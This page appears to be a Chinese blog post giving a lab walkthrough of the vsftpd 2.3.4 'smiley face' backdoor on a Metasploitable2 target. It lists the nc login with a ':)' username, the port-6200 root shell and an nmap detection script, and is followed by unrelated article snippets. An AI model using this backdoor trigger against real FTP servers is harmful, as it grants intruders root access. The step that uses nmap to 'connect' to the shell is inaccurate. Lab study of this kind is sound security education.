news 2026/1/15 10:30:50

漏洞扫描-笑脸漏洞

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
漏洞扫描-笑脸漏洞

一、实验准备:

1、Metaspolitable2(靶机)

2、kali

二、实验步骤:

1、打开kali和靶机,两者都要处于NAT模式

2、在终端使用命令(ip addr)查看kali的ip 然后nmap+kali IP,得到靶机ip

3、执行nmap -sV +(靶机IP)得到端口服务信息

4.手动模拟FTP登录,nc 192.168.61.130 21 回车后输入FTP用户名USER 1:),回车输入密码PASS 123,然后就可以crtl+C退出当前nc连接,注意:用户名一定要带有“:)”这个是触发笑脸漏洞的关键,密码任意都行。

5、nmap 192.168.61.130 -p 6200就可以连接到靶机的后门,拿到root权限。

三、正式的NSE-nmap脚本

针对VSFTPD v2.3.4的检测脚本它的方法为--script加上脚本名即nmap --script ftp-vsftpd-backdoor 192.168.61.130

本文只做分享,不做它用

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/1/10 5:39:34

YaeAchievement原神成就导出工具完整使用教程

YaeAchievement原神成就导出工具完整使用教程 【免费下载链接】YaeAchievement 更快、更准的原神成就导出工具 项目地址: https://gitcode.com/gh_mirrors/ya/YaeAchievement 在《原神》的冒险旅程中,成就系统记录了每位旅行者的成长足迹。YaeAchievement作为…

作者头像 李华
网站建设 2026/1/5 4:40:24

如何一键抢救QQ空间记忆:GetQzonehistory实战指南

如何一键抢救QQ空间记忆:GetQzonehistory实战指南 【免费下载链接】GetQzonehistory 获取QQ空间发布的历史说说 项目地址: https://gitcode.com/GitHub_Trending/ge/GetQzonehistory 还记得那些年你在QQ空间写过的说说吗?那些承载着青春记忆的文字…

作者头像 李华
网站建设 2026/1/11 2:16:17

Sunshine配置终极指南:打造完美游戏串流体验

Sunshine配置终极指南:打造完美游戏串流体验 【免费下载链接】Sunshine Sunshine: Sunshine是一个自托管的游戏流媒体服务器,支持通过Moonlight在各种设备上进行低延迟的游戏串流。 项目地址: https://gitcode.com/GitHub_Trending/su/Sunshine S…

作者头像 李华
网站建设 2026/1/14 15:20:18

2026毕设ssm+vue基于协同过滤算法的甜品推荐系统论文+程序

本系统(程序源码)带文档lw万字以上 文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容一、选题背景 近年来,我国烘焙与甜品消费规模以年均15%的速度递增,2023年线上甜品零售额已突破1200亿元。然而&…

作者头像 李华
网站建设 2026/1/13 22:49:26

KeymouseGo跨平台自动化工具:3分钟快速上手完整指南

KeymouseGo跨平台自动化工具:3分钟快速上手完整指南 【免费下载链接】KeymouseGo 类似按键精灵的鼠标键盘录制和自动化操作 模拟点击和键入 | automate mouse clicks and keyboard input 项目地址: https://gitcode.com/gh_mirrors/ke/KeymouseGo 还在为重复…

作者头像 李华
网站建设 2026/1/13 3:23:58

Zotero Style插件:让文献管理变得更智能高效

Zotero Style插件:让文献管理变得更智能高效 【免费下载链接】zotero-style zotero-style - 一个 Zotero 插件,提供了一系列功能来增强 Zotero 的用户体验,如阅读进度可视化和标签管理,适合研究人员和学者。 项目地址: https://…

作者头像 李华